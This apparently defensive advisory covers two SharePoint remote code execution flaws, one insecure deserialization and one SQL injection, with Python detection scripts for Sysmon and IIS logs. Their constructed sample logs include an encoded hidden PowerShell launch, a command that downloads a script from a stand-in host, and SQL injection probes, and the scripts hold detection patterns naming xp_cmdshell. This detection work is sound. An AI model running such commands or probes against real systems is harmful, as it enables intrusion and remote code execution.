High-Risk Remote Code Execution Vulnerabilities
The two vulnerabilities listed below affect the same product family: Microsoft SharePoint Server (on-premises).
While the technical root cause differs, both issues can realistically lead to full server compromise when SharePoint is exposed or insufficiently hardened.
This document is written from a defender's and analyst's perspective: how these flaws are abused in practice, what exploitation looks like on the wire and on the host, and how security teams can detect and respond.
Product Details
- Product: Microsoft SharePoint Server (Subscription Edition / 2019 / 2016 – varies by deployment)
- Deployment Type: On-premises
- Application Stack:
  - IIS (w3wp.exe)
  - ASP.NET
  - SQL Server backend
- Typical Exposure:
  - Internet-facing portals
  - VPN-accessible intranet
  - Hybrid environments
- Execution Context:
  - SharePoint application pool account
  - Often has high privileges in domain environments
High-Level Comparison Table
| Category | CVE-2026-20963 | CVE-2026-20947 |
|---|---|---|
| Vulnerability Type | Insecure Deserialization | SQL Injection |
| Primary Attack Surface | SharePoint web/API endpoints | SharePoint database-backed pages/APIs |
| Initial Access | Malicious serialized input | Crafted SQL payload in parameters |
| Authentication Needed | No (common scenarios) | Sometimes (endpoint dependent) |
| Skill Level Required | Medium | Low to Medium |
| Likelihood of Exploitation | High | Very High |
| Impact | Remote Code Execution | Remote Code Execution |
| Lateral Movement Potential | High | High |
| Detection Difficulty | Medium | Medium |
| Patch Availability | Yes (official Microsoft update) | Yes (official Microsoft update) |
CVE-2026-20963 – Insecure Deserialization Leading to RCE
What Is Really Going Wrong
SharePoint deserializes .NET objects as part of its internal workflows and API logic.
The vulnerable component trusts incoming serialized data and does not restrict which object types may be reconstructed in memory.
When SharePoint deserializes attacker-controlled data:
- Objects are instantiated automatically, before any application-level validation runs
- Certain .NET classes run code in constructors, property setters, or deserialization callbacks, and chains of such classes (gadget chains) turn that into arbitrary code execution
- The payload needs no explicit command execution call of its own; the side effects of deserialization do the work
Because no memory corruption is involved, a single crafted request is enough: exploitation is reliable and leaves little trace in the application itself.
How an Attacker Would Exploit This
- Attacker locates a SharePoint endpoint that accepts structured or encoded data.
- A malicious serialized object is crafted using known .NET gadget chains.
- The payload is embedded in an HTTP request (often Base64-encoded).
- SharePoint deserializes the object during request processing.
- Code executes immediately inside w3wp.exe, as the application pool identity.
At this point, the attacker can:
- Run system commands
- Drop web shells
- Execute PowerShell
- Pivot into the domain
Exploitation & PoC Status
- No public weaponized exploit is widely distributed.
- Proof-of-concept payloads do exist in private research circles.
- Exploitation is considered practically achievable using standard .NET deserialization techniques.
- Used primarily in targeted intrusions, not mass scanning (yet).
How This Can Be Detected in Real Environments
Common Red Flags
- IIS worker process spawning command-line tools
- SharePoint errors followed by unexpected service restarts
- Strange encoded blobs in POST requests
Key Log Sources
| Log Source | What to Watch |
|---|---|
| IIS Logs | Long encoded parameters, repeated POSTs |
| SharePoint ULS Logs | Deserialization or object type errors |
| Windows Security Logs | Process creation from w3wp.exe |
| EDR/XDR | PowerShell or cmd.exe launched by IIS |
Detection Logic
- Alert if w3wp.exe launches:
  - powershell.exe
  - cmd.exe
  - mshta.exe
- Flag HTTP requests containing:
  - Very large Base64 strings
  - Repeated failures followed by success
- Monitor for unexpected file writes in web directories
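The process-tree rule above, run over a few constructed Sysmon Event ID 1 (process creation) records, as an added example that is not code from the original advisory. It also treats sqlservr.exe as a watched parent, which is the host-side signal for the SQL injection flaw described later on this page. Every path, command line, host address and account name in the sample (including CONTOSO\svc_spapppool and CONTOSO\svc_spsql) is invented, and the list of extra child processes beyond powershell/cmd/mshta is an assumption to tune against your own baseline.

```python
"""Flag shells and script hosts spawned by w3wp.exe or sqlservr.exe.

Added example, not code from the original advisory. The records below mimic
the text rendering of Sysmon Event ID 1 (process creation); every value in
them (paths, command lines, the CONTOSO\\svc_* accounts) is constructed.
"""
import ntpath
import re

# Parents that have no business launching shells on a SharePoint or SQL host.
# sqlservr.exe covers the xp_cmdshell route described for the SQL injection flaw.
WATCHED_PARENTS = {"w3wp.exe", "sqlservr.exe"}

# The advisory's list (powershell, cmd, mshta) plus script hosts and LOLBins that
# commonly follow web-app exploitation (assumption: extend to your own baseline).
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe",
}
ENCODED_FLAG = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s")
STEALTH_FLAGS = re.compile(r"(?i)(^|\s)-(nop|noprofile|w\s+hidden|windowstyle\s+hidden|noni)\b")


def parse_sysmon_text(text):
    """Yield one dict per record; records are blank-line separated 'Key: value' lines."""
    rec = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if rec:
                yield rec
                rec = {}
            continue
        key, sep, value = line.partition(": ")
        if sep:
            rec[key] = value
    if rec:
        yield rec


def score_record(rec):
    """Return (severity, reasons); severity is None when the record is benign."""
    parent = ntpath.basename(rec.get("ParentImage", "")).lower()
    child = ntpath.basename(rec.get("Image", "")).lower()
    cmd = rec.get("CommandLine", "")
    if parent not in WATCHED_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None, []
    reasons = [f"{parent} spawned {child}"]
    if ENCODED_FLAG.search(cmd):
        reasons.append("encoded PowerShell command line")
    if STEALTH_FLAGS.search(cmd):
        reasons.append("stealth PowerShell flags")
    if child == "cmd.exe" and "powershell" in cmd.lower():
        reasons.append("cmd.exe relaying into PowerShell")
    return ("high" if len(reasons) > 1 else "medium"), reasons


def find_suspicious_children(text):
    """Score every record and return the hits, in log order."""
    hits = []
    for rec in parse_sysmon_text(text):
        severity, reasons = score_record(rec)
        if severity is None:
            continue
        hits.append({
            "utc_time": rec.get("UtcTime", ""),
            "user": rec.get("User", ""),
            "parent": ntpath.basename(rec.get("ParentImage", "")).lower(),
            "child": ntpath.basename(rec.get("Image", "")).lower(),
            "command_line": rec.get("CommandLine", ""),
            "severity": severity,
            "reasons": reasons,
        })
    return hits


# Constructed sample: three hits (records 1, 2 and 4) and two benign records.
SAMPLE_EVENTS = r"""
UtcTime: 2026-02-03 10:15:22.131
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
User: CONTOSO\svc_spapppool
ParentImage: C:\Windows\System32\inetsrv\w3wp.exe

UtcTime: 2026-02-03 10:15:40.002
Image: C:\Windows\System32\cmd.exe
CommandLine: cmd.exe /c whoami /all
User: CONTOSO\svc_spapppool
ParentImage: C:\Windows\System32\inetsrv\w3wp.exe

UtcTime: 2026-02-03 10:16:03.771
Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
CommandLine: csc.exe /noconfig /fullpaths @C:\Windows\Temp\abc.cmdline
User: CONTOSO\svc_spapppool
ParentImage: C:\Windows\System32\inetsrv\w3wp.exe

UtcTime: 2026-02-03 10:20:11.415
Image: C:\Windows\System32\cmd.exe
CommandLine: cmd.exe /c powershell -nop -c "iwr http://203.0.113.7/a.ps1 -o C:\Windows\Temp\a.ps1"
User: CONTOSO\svc_spsql
ParentImage: C:\Program Files\Microsoft SQL Server\MSSQL16.MSSQLSERVER\MSSQL\Binn\sqlservr.exe

UtcTime: 2026-02-03 10:25:00.000
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe
User: CONTOSO\jdoe
ParentImage: C:\Windows\explorer.exe
"""

if __name__ == "__main__":
    for hit in find_suspicious_children(SAMPLE_EVENTS):
        print(hit["severity"].upper(), hit["utc_time"], hit["user"], "; ".join(hit["reasons"]))
```

The third record (w3wp.exe compiling with csc.exe) is deliberately left benign: ASP.NET compiles pages on demand, so alerting on every child of the worker process drowns the signal. Note that the encoded-command and stealth-flag checks only raise severity; the parent/child pair alone is already worth a ticket on a SharePoint host.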
MITRE ATT&CK Mapping
- Exploit Public-Facing Application (T1190)
- Command and Scripting Interpreter (T1059)
- Server Software Component: Web Shell (T1505.003)
- Exploitation for Privilege Escalation (T1068)
CVE-2026-20947 – SQL Injection Leading to RCE
What Is Really Going Wrong
A SharePoint component builds SQL queries by concatenating user-supplied input instead of passing it as parameters.
This allows attackers to:
- Manipulate the query the content database executes
- Read or modify data in SharePoint content databases
- Chain SQL execution into operating system-level code execution, typically through xp_cmdshell or similar extended procedures; this last step depends on the rights of the SQL login SharePoint uses, since xp_cmdshell is disabled by default and needs sysadmin-level privileges to enable, which is a common misconfiguration rather than a given
Once the attacker controls the content and configuration databases, SharePoint is effectively lost: everything the farm stores and trusts lives there.
How an Attacker Would Exploit This
- Attacker identifies a vulnerable parameter in a page or API.
- SQL payload is injected into the request.
- Database executes attacker-controlled SQL.
- Attacker escalates from data access to command execution.
- Persistent access is established on the server.
This vulnerability is especially dangerous because:
- SQL injection is easy to test with a single quote or a time delay
- Many detection tools miss low-noise payloads
- The SQL Server and SharePoint service accounts are frequently domain accounts with broad rights, so database access often leads to domain compromise
Exploitation & PoC Status
- No official public exploit release.
- SQL injection techniques are well-known and mature.
- Whether a parameter is injectable can be confirmed through:
  - Error-based behavior (database errors leaking into responses)
  - Time-delay responses (for example, WAITFOR DELAY)
- Practical exploitation is considered highly feasible.
How This Can Be Detected in Real Environments
Common Red Flags
- Database errors appearing in HTTP responses
- Unusual query execution patterns
- Performance degradation during attacks
Key Log Sources
| Log Source | What to Watch |
|---|---|
| IIS Logs | Special characters in request parameters |
| SQL Server Logs | Abnormal query structures |
| SharePoint ULS Logs | Database execution failures |
| Database Auditing | sp_configure changes (e.g., enabling xp_cmdshell), new logins, role membership changes |
Detection Logic
- Alert on:
  - SQL errors tied to a single client IP
  - Repeated failed queries with minor variations
- Monitor for:
  - SQL Server spawning OS-level processes
  - Unexpected stored procedure execution
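The request-side checks from both detection sections on this page, run over a constructed IIS W3C log: oversized encoded parameters (the deserialization indicator) and, per client, SQL error responses, time delays and near-duplicate probes (the injection indicators). This is an added example, not code from the advisory. The handler path /_layouts/15/example.aspx, the client addresses and the thresholds (200-character blobs, 5-second delay) are assumptions, and the script only sees the query string because IIS does not log POST bodies; body-borne payloads need a WAF, reverse proxy or Failed Request Tracing to surface.

```python
"""Triage IIS W3C logs for the indicator families named in this advisory:
oversized encoded parameters (deserialization) and SQL injection probing.

Added example, not code from the original advisory. The log lines are
constructed and the handler path /_layouts/15/example.aspx is a placeholder,
not a known vulnerable endpoint. IIS logs keep the query string but not POST
bodies, so this script inspects cs-uri-query only.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Base64 of the .NET BinaryFormatter stream header bytes 00 01 00 00 00 FF FF FF FF.
BINARYFORMATTER_B64_PREFIX = "AAEAAAD/////"
BLOB_MIN_LEN = 200          # assumption: baseline against your own legitimate traffic
B64_VALUE = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % BLOB_MIN_LEN)
SQLI_MARKERS = re.compile(
    r"(?i)(union\s+select|waitfor\s+delay|xp_cmdshell|sp_oacreate|"
    r"'\s*(or|and)\b|'\s*;|--\s*$|'$)"
)
SLOW_MS = 5000              # assumption: time-based injection usually waits 5 s or more


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split(" ")
        if len(values) == len(fields):     # skip malformed lines
            yield dict(zip(fields, values))


def analyze_iis_log(text):
    """Return {'blob_requests': [...], 'sqli_suspects': {client_ip: stats}}."""
    blob_requests = []
    per_ip = defaultdict(lambda: {"marker_requests": 0, "server_errors": 0,
                                  "max_time_taken": 0, "variants": set()})
    for rec in parse_w3c(text):
        query = rec["cs-uri-query"]
        if query == "-":
            continue
        params = parse_qsl(query, keep_blank_values=True)   # URL-decodes each value
        ip, stem = rec["c-ip"], rec["cs-uri-stem"]
        status, time_taken = int(rec["sc-status"]), int(rec["time-taken"])
        # (a) a parameter that is one long base64-looking token
        for name, value in params:
            if B64_VALUE.fullmatch(value):
                blob_requests.append({
                    "c_ip": ip, "stem": stem, "param": name, "length": len(value),
                    "binaryformatter_magic": value.startswith(BINARYFORMATTER_B64_PREFIX),
                    "sc_status": status,
                })
        # (b) SQL meta-characters and keywords, aggregated per client
        decoded = "&".join(f"{n}={v}" for n, v in params)
        if SQLI_MARKERS.search(decoded):
            s = per_ip[ip]
            s["marker_requests"] += 1
            s["server_errors"] += int(status >= 500)
            s["max_time_taken"] = max(s["max_time_taken"], time_taken)
            s["variants"].add((stem, decoded))
    suspects = {}
    for ip, s in per_ip.items():
        if s["marker_requests"] >= 2 or s["server_errors"] or s["max_time_taken"] >= SLOW_MS:
            suspects[ip] = {**s, "variants": len(s["variants"])}
    return {"blob_requests": blob_requests, "sqli_suspects": suspects}


# Constructed sample: header prefix plus filler stands in for a real gadget chain.
_BLOB = "AAEAAAD%2F%2F%2F%2F%2F" + "A" * 300
SAMPLE_LOG = f"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2026-02-03 10:14:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 CONTOSO\\jdoe 10.0.0.20 Mozilla/5.0 - 200 0 0 35
2026-02-03 10:15:22 10.0.0.5 POST /_layouts/15/example.aspx data={_BLOB} 443 - 203.0.113.7 python-requests/2.31 - 500 0 0 120
2026-02-03 10:31:05 10.0.0.5 GET /_layouts/15/example.aspx id=1%27 443 - 198.51.100.9 Mozilla/5.0 - 500 0 0 40
2026-02-03 10:31:06 10.0.0.5 GET /_layouts/15/example.aspx id=1%27%20OR%201%3D1-- 443 - 198.51.100.9 Mozilla/5.0 - 500 0 0 38
2026-02-03 10:31:09 10.0.0.5 GET /_layouts/15/example.aspx id=1%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 443 - 198.51.100.9 Mozilla/5.0 - 200 0 0 5120
2026-02-03 10:32:00 10.0.0.5 GET /_layouts/15/example.aspx id=1 443 - 10.0.0.20 Mozilla/5.0 - 200 0 0 30
"""

if __name__ == "__main__":
    result = analyze_iis_log(SAMPLE_LOG)
    for blob in result["blob_requests"]:
        print("BLOB", blob)
    for ip, stats in result["sqli_suspects"].items():
        print("SQLI", ip, stats)
```

Two design points: the per-client aggregation is what separates a probe from a typo, since one stray quote from a user is noise but three variants against the same page with 500s and a five-second response is a campaign; and the time-taken check catches blind injection that never produces an error, which is exactly the low-noise case the advisory says tools miss.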
MITRE ATT&CK Mapping
- Exploit Public-Facing Application (T1190)
- Server Software Component: SQL Stored Procedures (T1505.001)
- Exploitation for Privilege Escalation (T1068)
- Data Manipulation (T1565)
Risk Summary
| Area | Risk Level |
|---|---|
| Internet-Exposed SharePoint | Critical |
| Internal-Only SharePoint | High |
| Unpatched Legacy Versions | Critical |
| Weak Monitoring | Severe |
| Domain-Joined SharePoint | Extreme |
Once exploited, both vulnerabilities allow attackers to fully own the server and often the surrounding Active Directory environment.
Official Remediation
Action Required Immediately
- Apply the latest Microsoft SharePoint Security Updates
- Use the official Microsoft patch channel only:
👉 https://msrc.microsoft.com/update-guide
Post-Patch Actions
- Complete the update by running the SharePoint Products Configuration Wizard (psconfig) on every server in the farm; installing the package alone patches the binaries but does not upgrade the farm
- Verify that the farm build version shown in Central Administration matches the patched build
- Re-scan exposed endpoints
- Review logs for pre-patch compromise indicators; patching does not evict an attacker who has already planted a web shell or stolen credentials
Final Defender Notes
These are not theoretical issues.
They represent real attack paths used in targeted intrusions, especially against organizations running on-premises SharePoint.
